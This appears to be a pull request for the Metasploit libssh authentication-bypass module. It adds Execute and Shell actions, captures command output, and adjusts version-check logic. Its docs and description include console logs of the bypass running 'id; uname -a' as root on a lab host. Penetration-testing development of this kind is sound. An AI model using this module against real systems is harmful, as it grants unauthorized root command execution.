### PR TITLE
Enable non-session command output for SSH modules

### DIFF
--- a/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md
+++ b/documentation/modules/auxiliary/scanner/ssh/libssh_auth_bypass.md
@@ -20,13 +20,21 @@ additional code paths to be followed.
 4. Follow the steps in `INSTALL` to build libssh
 5. Run `build/examples/ssh_server_fork` (I like to `strace` it)
 
+## Actions
+
+```
+Name     Description
+----     -----------
+Execute  Execute a command
+Shell    Spawn a shell
+```
+
 ## Options
 
 **CMD**
 
-Set this to a command you want to execute in lieu of a standard shell
-session. An `exec` channel request will be sent instead of a `shell`
-request.
+Set this to a command or shell you want to execute. An `exec` channel
+request will be sent instead of a `shell` channel request.
 
 **SPAWN_PTY**
 
@@ -74,6 +82,25 @@ Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 20
 tty
 /dev/pts/1
 #
+```
+
+Positive testing of shell commands using the `Execute` action:
+
+```
+msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
+action => Execute
+msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
+cmd => id; uname -a
+msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
+
+[*] 172.28.128.3:2222 - Attempting authentication bypass
+[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
+[*] 172.28.128.3:2222 - Executed: id; uname -a
+uid=0(root) gid=0(root) groups=0(root)
+Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
 ```
 
 Negative testing against patched libssh 0.8.4:

--- a/lib/net/ssh/command_stream.rb
+++ b/lib/net/ssh/command_stream.rb
@@ -21,6 +21,7 @@ class CommandStream
     end
 
     channel[:data] = ''
+    channel[:extended_data] = ''
 
     channel.on_eof do
       cleanup
@@ -32,10 +33,12 @@ class CommandStream
 
     channel.on_data do |ch, data|
       self.rsock.write(data)
+      channel[:data] << data
     end
 
     channel.on_extended_data do |ch, ctype, data|
       self.rsock.write(data)
+      channel[:extended_data] << data
     end
 
     self.channel = channel

--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -75,8 +75,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     if action.name == 'Execute' && datastore['CMD'].blank?
-      print_error('CMD is required to be set for the Execute action')
-      return
+      fail_with(Failure::BadConfig, 'Execute action requires CMD to be set')
     end
 
     factory = ssh_socket_factory

--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -62,18 +62,15 @@ class MetasploitModule < Msf::Auxiliary
 
     if v.nil?
       vprint_error("#{ip}:#{rport} - #{version} does not appear to be libssh")
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Unknown
     elsif v.between?(Gem::Version.new('0.6.0'), Gem::Version.new('0.7.5')) ||
           v.between?(Gem::Version.new('0.8.0'), Gem::Version.new('0.8.3'))
       vprint_good("#{ip}:#{rport} - #{version} appears to be unpatched")
-      return Exploit::CheckCode::Appears
+      Exploit::CheckCode::Appears
     else
       vprint_error("#{ip}:#{rport} - #{version} appears to be patched")
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
-
-    # Hopefully we never hit this
-    Exploit::CheckCode::Unknown
   end
 
   def run_host(ip)


### PR DESCRIPTION
Looks like `channel[:data]` was initialized but never used.

The socket pair is closed on EOF from the command, which is why we couldn't read output outside a shell session.

```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
action => Execute
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
cmd => id; uname -a
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run

[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] 172.28.128.3:2222 - Executed: id; uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```

#10820